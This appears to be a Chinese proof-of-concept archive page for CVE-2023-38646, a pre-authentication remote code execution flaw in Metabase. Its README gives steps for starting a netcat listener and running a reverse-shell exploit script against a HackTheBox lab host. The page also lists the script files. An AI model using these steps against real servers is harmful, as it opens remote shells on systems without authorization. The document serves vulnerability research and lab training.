关联漏洞
标题:
Metabase 安全漏洞
(CVE-2023-38646)
描述:Metabase是美国Metabase公司的一个开源数据分析平台。 Metabase 0.46.6.1之前版本和Metabase Enterprise 1.46.6.1之前版本存在安全漏洞,该漏洞源于允许攻击者以运行该服务的权限在服务器上执行任意命令。
介绍
<h1 style="font-size:10vw" align="left">CVE-2023-38646 - Metabase Pre-Auth RCE</h1>
<img src="https://img.shields.io/badge/CVSS:3.1%20Score%20-9.8 CRITICAL-red"> <img src="https://img.shields.io/badge/Vulnerability%20Types-%20Remote%20Code%20Execution-blue">
*****
⚠️ *For educational and authorized security research purposes only*
## Original Exploit Authors
Very grateful to the original PoC author [securezeron](https://github.com/securezeron)
## Step Guides
1. Set Up the Listener on your attacker machine:
```bash
nc -nlvp 4444
```
2. Then, run this command:
```bash
python3 CVE-2023-38646-Reverse-Shell.py -h
python3 CVE-2023-38646-Reverse-Shell.py --rhost http://data.analytical.htb/ --lhost 10.10.16.8 --lport 4444
```
## Credits
- https://nvd.nist.gov/vuln/detail/CVE-2023-38646
- https://medium.com/@starlox.riju123/hackthebox-analytics-metabase-rce-bd3421cba76d
- https://www.youtube.com/watch?v=br7JZzcTDG0
文件快照
[4.0K] /data/pocs/6aca0562ab5e802152f87987030ed373eae33dc6
├── [2.0K] CVE-2023-38646-POC.py
├── [4.0K] CVE-2023-38646-Reverse-Shell.py
└── [1.1K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。